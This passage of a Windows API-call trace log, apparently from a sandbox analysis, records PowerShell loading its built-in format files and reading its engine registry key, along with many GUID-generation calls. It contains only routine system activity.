	[0803.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0803.583] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x667e94c4, Data2=0xd18, Data3=0x4ccc, Data4=([0]=0xb4, [1]=0x6f, [2]=0x4e, [3]=0x79, [4]=0x25, [5]=0x58, [6]=0x27, [7]=0x2b))) returned 0x0
	[0803.584] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xce35a075, Data2=0x7b35, Data3=0x46f5, Data4=([0]=0x91, [1]=0x83, [2]=0x33, [3]=0x2c, [4]=0xe7, [5]=0x8d, [6]=0xc7, [7]=0x2f))) returned 0x0
	[0803.585] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x99d65297, Data2=0x56f2, Data3=0x4d1f, Data4=([0]=0x9b, [1]=0x2d, [2]=0xf5, [3]=0x54, [4]=0xac, [5]=0xa3, [6]=0xa4, [7]=0xa6))) returned 0x0
	[0803.585] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x576a256e, Data2=0xf3ea, Data3=0x445f, Data4=([0]=0xb1, [1]=0x7c, [2]=0x86, [3]=0xed, [4]=0x9b, [5]=0xcb, [6]=0x24, [7]=0x73))) returned 0x0
	[0803.586] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x827f2d60, Data2=0x789d, Data3=0x4931, Data4=([0]=0x95, [1]=0xd4, [2]=0x2, [3]=0x89, [4]=0x6a, [5]=0x8, [6]=0x1e, [7]=0xee))) returned 0x0
	[0803.587] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x5a335a1c, Data2=0x3cfd, Data3=0x4e1c, Data4=([0]=0x90, [1]=0x5d, [2]=0x7d, [3]=0xcf, [4]=0xf9, [5]=0x74, [6]=0x49, [7]=0x5))) returned 0x0
	[0803.587] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x456d4cf5, Data2=0x3a18, Data3=0x4c9c, Data4=([0]=0xb9, [1]=0x20, [2]=0x6e, [3]=0x19, [4]=0xa2, [5]=0xa, [6]=0x4c, [7]=0xbc))) returned 0x0
	[0803.587] VirtualQuery (in: lpAddress=0x14bde0, lpBuffer=0x14cca0, dwLength=0x30 | out: lpBuffer=0x14cca0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0803.589] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x35c7e62f, Data2=0x4ac5, Data3=0x4845, Data4=([0]=0x9d, [1]=0xea, [2]=0x70, [3]=0x42, [4]=0xf6, [5]=0xf6, [6]=0x45, [7]=0x3))) returned 0x0
	[0803.590] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x946b82e0, Data2=0x5d4d, Data3=0x4d33, Data4=([0]=0x8a, [1]=0xde, [2]=0x5e, [3]=0x30, [4]=0xea, [5]=0xd5, [6]=0x46, [7]=0x19))) returned 0x0
	[0803.592] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xff31edbf, Data2=0xbfe2, Data3=0x4c6d, Data4=([0]=0xa2, [1]=0x6c, [2]=0x59, [3]=0xf8, [4]=0xfc, [5]=0xa2, [6]=0xf6, [7]=0xb1))) returned 0x0
	[0803.593] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x1ca4d377, Data2=0xdc5f, Data3=0x4c3e, Data4=([0]=0x88, [1]=0xc2, [2]=0x63, [3]=0x91, [4]=0x6a, [5]=0x63, [6]=0x61, [7]=0xc9))) returned 0x0
	[0803.593] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xe5c33eca, Data2=0x813a, Data3=0x4cf3, Data4=([0]=0xa1, [1]=0xd7, [2]=0x6c, [3]=0x1b, [4]=0xda, [5]=0xac, [6]=0xbf, [7]=0xd4))) returned 0x0
	[0803.593] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xab0d162f, Data2=0xba3c, Data3=0x44d9, Data4=([0]=0x81, [1]=0x88, [2]=0x98, [3]=0x2c, [4]=0xed, [5]=0xea, [6]=0x5e, [7]=0x72))) returned 0x0
	[0803.593] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x5b1d8933, Data2=0x4c30, Data3=0x4eb9, Data4=([0]=0x8b, [1]=0xc5, [2]=0x1d, [3]=0x15, [4]=0x78, [5]=0x70, [6]=0x8, [7]=0xb7))) returned 0x0
	[0803.594] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8ced76, Data2=0xcdcf, Data3=0x4217, Data4=([0]=0x91, [1]=0x75, [2]=0xac, [3]=0x4e, [4]=0x28, [5]=0xc2, [6]=0xbd, [7]=0x14))) returned 0x0
	[0803.594] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x26f98f6b, Data2=0xac9d, Data3=0x4791, Data4=([0]=0x98, [1]=0xee, [2]=0x2, [3]=0xf3, [4]=0xd8, [5]=0xc9, [6]=0x83, [7]=0xaf))) returned 0x0
	[0803.594] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8843a4f, Data2=0xd1f4, Data3=0x4344, Data4=([0]=0xbe, [1]=0x83, [2]=0x3a, [3]=0x35, [4]=0xe6, [5]=0x33, [6]=0x33, [7]=0x67))) returned 0x0
	[0803.594] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x4f877447, Data2=0x7bc9, Data3=0x4d4c, Data4=([0]=0x83, [1]=0xef, [2]=0x45, [3]=0x7e, [4]=0xa8, [5]=0x57, [6]=0xec, [7]=0xbc))) returned 0x0
	[0803.594] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x6c4963d4, Data2=0xb744, Data3=0x4ce6, Data4=([0]=0xab, [1]=0xd0, [2]=0x6d, [3]=0xc0, [4]=0x31, [5]=0x5a, [6]=0x98, [7]=0x2f))) returned 0x0
	[0803.594] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x49f35b96, Data2=0xa0cc, Data3=0x43c6, Data4=([0]=0x96, [1]=0x8c, [2]=0xe9, [3]=0x37, [4]=0x4c, [5]=0xf, [6]=0x80, [7]=0x64))) returned 0x0
	[0803.595] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x3cc68fbc, Data2=0x7b6c, Data3=0x4c06, Data4=([0]=0xa5, [1]=0x32, [2]=0x9a, [3]=0xc1, [4]=0x4c, [5]=0xd, [6]=0x73, [7]=0xf4))) returned 0x0
	[0803.595] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf45aaa1d, Data2=0xaf48, Data3=0x46d8, Data4=([0]=0xb8, [1]=0x86, [2]=0x91, [3]=0x32, [4]=0xd9, [5]=0xca, [6]=0xe6, [7]=0xa7))) returned 0x0
	[0803.595] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xb54105c1, Data2=0xb9ef, Data3=0x46e2, Data4=([0]=0x95, [1]=0x22, [2]=0xe, [3]=0xa4, [4]=0xa1, [5]=0xca, [6]=0x1a, [7]=0x6a))) returned 0x0
	[0803.595] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x595e562d, Data2=0xedb4, Data3=0x45f9, Data4=([0]=0xbd, [1]=0x98, [2]=0xdf, [3]=0x6f, [4]=0xc4, [5]=0x6d, [6]=0xe3, [7]=0xc5))) returned 0x0
	[0803.595] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xa28d3a8b, Data2=0xabbc, Data3=0x48e4, Data4=([0]=0xa8, [1]=0x60, [2]=0xec, [3]=0xf1, [4]=0x63, [5]=0x16, [6]=0x77, [7]=0xb3))) returned 0x0
	[0803.595] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x2690feb3, Data2=0x8b8e, Data3=0x4ac1, Data4=([0]=0xb9, [1]=0x34, [2]=0xc8, [3]=0x14, [4]=0x49, [5]=0xf4, [6]=0xb8, [7]=0xe1))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x30c2df48, Data2=0x7a85, Data3=0x461c, Data4=([0]=0x9f, [1]=0x74, [2]=0xa4, [3]=0x65, [4]=0xd0, [5]=0xac, [6]=0x8, [7]=0x50))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x220f5c5e, Data2=0x54d2, Data3=0x473a, Data4=([0]=0x82, [1]=0x75, [2]=0x15, [3]=0x8b, [4]=0xd9, [5]=0x85, [6]=0x1b, [7]=0x17))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x60b8fba9, Data2=0xc5e, Data3=0x49de, Data4=([0]=0xab, [1]=0x4, [2]=0xff, [3]=0x4a, [4]=0x4e, [5]=0xbb, [6]=0x18, [7]=0x7c))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd4e52576, Data2=0xde5d, Data3=0x46d9, Data4=([0]=0xb2, [1]=0x35, [2]=0xce, [3]=0xf4, [4]=0x6c, [5]=0xec, [6]=0x1a, [7]=0x38))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xe1c8f446, Data2=0xcec, Data3=0x4ad9, Data4=([0]=0xaf, [1]=0x95, [2]=0xd8, [3]=0x9c, [4]=0xf6, [5]=0x23, [6]=0x80, [7]=0x7b))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x67d1fabf, Data2=0xd02f, Data3=0x43e0, Data4=([0]=0x9b, [1]=0x4a, [2]=0x16, [3]=0xe0, [4]=0x16, [5]=0xe1, [6]=0x54, [7]=0xd3))) returned 0x0
	[0803.596] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xfd0cdbb0, Data2=0xc396, Data3=0x4e94, Data4=([0]=0xb6, [1]=0x13, [2]=0x7d, [3]=0xde, [4]=0x20, [5]=0x3e, [6]=0x73, [7]=0x53))) returned 0x0
	[0803.598] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd7ecde1c, Data2=0x7c8f, Data3=0x411a, Data4=([0]=0x8d, [1]=0xb0, [2]=0xb, [3]=0xfb, [4]=0x85, [5]=0x34, [6]=0x91, [7]=0xa9))) returned 0x0
	[0803.598] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x1fbea561, Data2=0x7bd5, Data3=0x4643, Data4=([0]=0x9b, [1]=0x84, [2]=0x51, [3]=0x6a, [4]=0x54, [5]=0xfd, [6]=0xfc, [7]=0x39))) returned 0x0
	[0803.598] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x3c9248c9, Data2=0xb16e, Data3=0x44ab, Data4=([0]=0xa9, [1]=0x11, [2]=0x97, [3]=0xfd, [4]=0x44, [5]=0xf7, [6]=0xb5, [7]=0xbf))) returned 0x0
	[0803.598] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x3620e9d2, Data2=0xe30d, Data3=0x4cb5, Data4=([0]=0xa5, [1]=0x7c, [2]=0x72, [3]=0xa4, [4]=0xc5, [5]=0xea, [6]=0x69, [7]=0x89))) returned 0x0
	[0803.598] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x333be9bf, Data2=0x656d, Data3=0x47e4, Data4=([0]=0xb3, [1]=0x19, [2]=0x63, [3]=0xa5, [4]=0xeb, [5]=0x3a, [6]=0x74, [7]=0xff))) returned 0x0
	[0803.599] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8c075188, Data2=0xc4e4, Data3=0x40ec, Data4=([0]=0x8f, [1]=0xf6, [2]=0xe8, [3]=0x9b, [4]=0x14, [5]=0x46, [6]=0x3b, [7]=0xd4))) returned 0x0
	[0803.599] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x363042bb, Data2=0xd3ff, Data3=0x4502, Data4=([0]=0xa0, [1]=0xda, [2]=0x85, [3]=0xe, [4]=0xb7, [5]=0x58, [6]=0x73, [7]=0xf6))) returned 0x0
	[0803.599] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x9e942e39, Data2=0x87ae, Data3=0x4687, Data4=([0]=0xbc, [1]=0xa9, [2]=0x16, [3]=0x44, [4]=0x39, [5]=0x53, [6]=0x17, [7]=0x7f))) returned 0x0
	[0803.599] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x463b816f, Data2=0xc98c, Data3=0x41f1, Data4=([0]=0x90, [1]=0x84, [2]=0x14, [3]=0xdb, [4]=0x11, [5]=0x4b, [6]=0xf3, [7]=0x83))) returned 0x0
	[0803.599] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd45b374d, Data2=0x2f90, Data3=0x44d4, Data4=([0]=0x84, [1]=0x97, [2]=0xec, [3]=0xee, [4]=0x42, [5]=0xe1, [6]=0x2, [7]=0x84))) returned 0x0
	[0803.599] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf4040785, Data2=0x8fe2, Data3=0x4ce6, Data4=([0]=0xaf, [1]=0x3d, [2]=0xd3, [3]=0x53, [4]=0x4e, [5]=0x23, [6]=0xf5, [7]=0x5a))) returned 0x0
	[0803.600] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xbe658e5a, Data2=0x378d, Data3=0x4d4d, Data4=([0]=0x82, [1]=0xa0, [2]=0xaa, [3]=0xf5, [4]=0x18, [5]=0x8f, [6]=0xc1, [7]=0xfd))) returned 0x0
	[0803.600] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xc1cb4e4e, Data2=0xdceb, Data3=0x4e75, Data4=([0]=0xb8, [1]=0xe4, [2]=0xa6, [3]=0x17, [4]=0x7d, [5]=0x39, [6]=0x4d, [7]=0xfa))) returned 0x0
	[0803.600] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x9953f0df, Data2=0xe0f3, Data3=0x4fa7, Data4=([0]=0xbf, [1]=0xe5, [2]=0x7d, [3]=0xa1, [4]=0x9e, [5]=0x83, [6]=0x45, [7]=0x83))) returned 0x0
	[0803.600] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd69489f4, Data2=0xd1a4, Data3=0x4931, Data4=([0]=0xb6, [1]=0xee, [2]=0xef, [3]=0x85, [4]=0x18, [5]=0x13, [6]=0xc8, [7]=0xc0))) returned 0x0
	[0803.600] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0803.600] GetFileType (hFile=0x2f4) returned 0x1
	[0803.601] SetErrorMode (uMode=0x1) returned 0x1
	[0803.601] GetFileType (hFile=0x2f4) returned 0x1
	[0803.601] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e5448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e5448*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.602] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e5448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e5448*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.602] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e5448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e5448*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.602] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e5448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e5448*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.602] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e5448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e5448*, lpNumberOfBytesRead=0x14d178*=0x8b4, lpOverlapped=0x0) returned 1
	[0803.602] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e4864, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e4864*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0803.602] ReadFile (in: hFile=0x2f4, lpBuffer=0x35e5448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x35e5448*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0803.603] CloseHandle (hObject=0x2f4) returned 1
	[0803.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0803.603] SetErrorMode (uMode=0x1) returned 0x1
	[0803.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0803.603] SetErrorMode (uMode=0x1) returned 0x1
	[0803.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0803.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2f4) returned 0x0
	[0803.604] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0803.604] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a1c0
	[0803.604] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a1c0, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0803.604] CoTaskMemFree (pv=0x1ba3a1c0) 
	[0803.604] RegCloseKey (hKey=0x2f4) returned 0x0
	[0803.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0803.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0803.605] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x250d35ee, Data2=0x9dc1, Data3=0x4da0, Data4=([0]=0xbe, [1]=0xa8, [2]=0xf0, [3]=0x1f, [4]=0xef, [5]=0xfb, [6]=0x8c, [7]=0xbb))) returned 0x0
	[0803.605] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x9354a8b6, Data2=0x6b91, Data3=0x4bac, Data4=([0]=0xba, [1]=0xb5, [2]=0xc0, [3]=0xc7, [4]=0x88, [5]=0xe8, [6]=0x78, [7]=0xfd))) returned 0x0
	[0803.605] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0803.605] GetFileType (hFile=0x2f4) returned 0x1
	[0803.605] SetErrorMode (uMode=0x1) returned 0x1
	[0803.605] GetFileType (hFile=0x2f4) returned 0x1
	[0803.605] ReadFile (in: hFile=0x2f4, lpBuffer=0x3623230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3623230*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0804.748] ReadFile (in: hFile=0x2f4, lpBuffer=0x3623230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3623230*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0804.748] ReadFile (in: hFile=0x2f4, lpBuffer=0x3623230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3623230*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0804.748] ReadFile (in: hFile=0x2f4, lpBuffer=0x3623230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3623230*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0804.749] ReadFile (in: hFile=0x2f4, lpBuffer=0x3623230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3623230*, lpNumberOfBytesRead=0x14d178*=0xe98, lpOverlapped=0x0) returned 1
	[0804.749] ReadFile (in: hFile=0x2f4, lpBuffer=0x3622830, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3622830*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0804.749] ReadFile (in: hFile=0x2f4, lpBuffer=0x3623230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3623230*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0804.749] CloseHandle (hObject=0x2f4) returned 1
	[0804.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0804.749] SetErrorMode (uMode=0x1) returned 0x1
	[0804.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0804.750] SetErrorMode (uMode=0x1) returned 0x1
	[0804.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0804.750] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2f4) returned 0x0
	[0804.750] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0804.750] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a1c0
	[0804.750] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a1c0, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0804.750] CoTaskMemFree (pv=0x1ba3a1c0) 
	[0804.750] RegCloseKey (hKey=0x2f4) returned 0x0
	[0804.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0804.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0804.751] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8615bd29, Data2=0x59d9, Data3=0x4173, Data4=([0]=0xb9, [1]=0xa9, [2]=0xb2, [3]=0xc5, [4]=0x51, [5]=0xdb, [6]=0x9c, [7]=0x46))) returned 0x0
	[0804.752] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xfc90602c, Data2=0x7026, Data3=0x460c, Data4=([0]=0xa6, [1]=0x4a, [2]=0xa4, [3]=0x8e, [4]=0x7e, [5]=0xb9, [6]=0x9e, [7]=0xb4))) returned 0x0
	[0804.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
